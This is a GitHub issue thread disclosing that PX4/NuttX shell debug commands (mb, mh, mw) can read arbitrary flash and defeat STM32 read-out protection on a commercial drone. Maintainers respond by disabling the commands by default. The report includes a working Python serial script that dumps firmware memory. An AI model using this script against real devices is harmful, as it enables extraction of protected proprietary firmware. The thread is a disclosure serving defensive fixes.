PX4/PX4-Autopilot #17062: Nsh Debug Commands Vulnerability Report

swkim101, 2021-03-09:
## Nsh's `mb`, `mh`, and `mw` commands can leak intellectual property.

Exploiting those commands makes it possible to extract firmware from the flash memory because `mb`, `mh`, and `mw` can read the firmware code at an arbitrary location.
You may know that some commercial vendors can customize their firmware without opening even binary code.
However, those commands can neutralize the intellectual protection scheme to prevent from reading binary firmware code.

We found this issue on [Yuneec](https://us.yuneec.com/), a commercial drone vendor, which has sold multiple drone models such as Typhoon H. 
This drone vendor has made efforts to protect its firmware from reading out, applying [ST's hardware read protection](https://www.st.com/resource/en/application_note/dm00186528-proprietary-code-read-out-protection-on-microcontrollers-of-the-stm32f4-series-stmicroelectronics.pdf) to its drones.   
Nevertheless, the `mb 0x8000000` command naively prints Typhoon H's firmware binary code, bypassing the protection scheme.

PoC is as follows:

```python
import serial
ser = serial.Serial(
   port='COM7',\
   baudrate=57600,\
   parity=serial.PARITY_NONE,\
   stopbits=serial.STOPBITS_ONE,\
   bytesize=serial.EIGHTBITS,\
   timeout=0)
f = open('output_db000.txt', 'wb')
for addr in range(0x080db000, 0x08200000, 0x1000):
   count = 0
   ser.write(b'mw ')
   ser.write(bytes(hex(addr), 'ascii'))
   ser.write(b' 1000\r\n')
   print(hex(addr))
   while True:
       line = ser.readline()
       f.write(line)
       #print(line)
   
       if(len(line) <= 5 and count != 0):
           break
       count += 1
f.close()
```

Only if possible, we believe the best way to prevent this vulnerability is to remove mb, mh, and mw commands.  
If that is not allowed due to debugging purpose, we would like to suggest the following actions can help protect intellectual properties from this vulnerability:  
(1) please add comments in the source code.  
(2) please show warnings in compile messages.  
(3) please disable those commands in the default configuration (`CONFIG_NSH_DISABLE_MW=y`)

LorenzMeier, 2021-03-09:
Once you have access to NSH you have the equivalent of root access to the system. If a manufacturer enables NSH access, they have already decided (implicitly or explicitly) to provide full access to the system, with all ramifications.

So I would argue that anyone enabling NSH in their build is ok with that and that the correct fix here is to disable NSH access altogether if you don't want that.

swkim101, 2021-03-10:
I think "mw"-like commands should be disabled or adequately inform of their potential threats.

It is true that giving NSH access to users provides full access to the system.
Yet, the intent of commercial vendor developers (e.g., Yuneec) is still to protect firmware from extraction because:
(1) They decided to use "readout" protection, making it impossible to read firmware even if using a debugger.
(2) They did not expose the command shell interface, such as UART

Nevertheless, such developers may not be aware that there is a detour to extract the firmware described in this issue post.
Even though developers enabled "readout" protection, their efforts are neutralized by "mw"-like command exploitation.
I believe noticing this security issue makes developers prevent the vulnerability.

For that reason, I would suggest that "mw"-like commands may be disabled at default (or should provide some warning messages for it).
If the developers need to use that, they may enable such commands explicitly.

swkim101, 2021-03-29:
@LorenzMeier, You can see that the Nuttx community has decided to disable the mw-like commands by default at the following link: https://github.com/apache/incubator-nuttx/issues/3011

dagar, 2021-03-29:
I'm not aware of typical users/developers actually using these on a regular basis, so I'd be fine with disabling them by default (saving a little bit of flash). I'll open a PR and give it a bit of time for any objections.

dagar, 2021-03-29:
Pull request - https://github.com/PX4/PX4-Autopilot/pull/17264

closed 2021-03-30 by dagar

swkim101, 2021-04-08:
Acknowledgment: This vulnerability was found out by the following people (alphabetical order):
- Gisu Yeo <wcharcode@gmail.com>
- Sungwoo Kim <kim3583@purdue.edu>
- Taegyu Kim <tgkim@purdue.edu>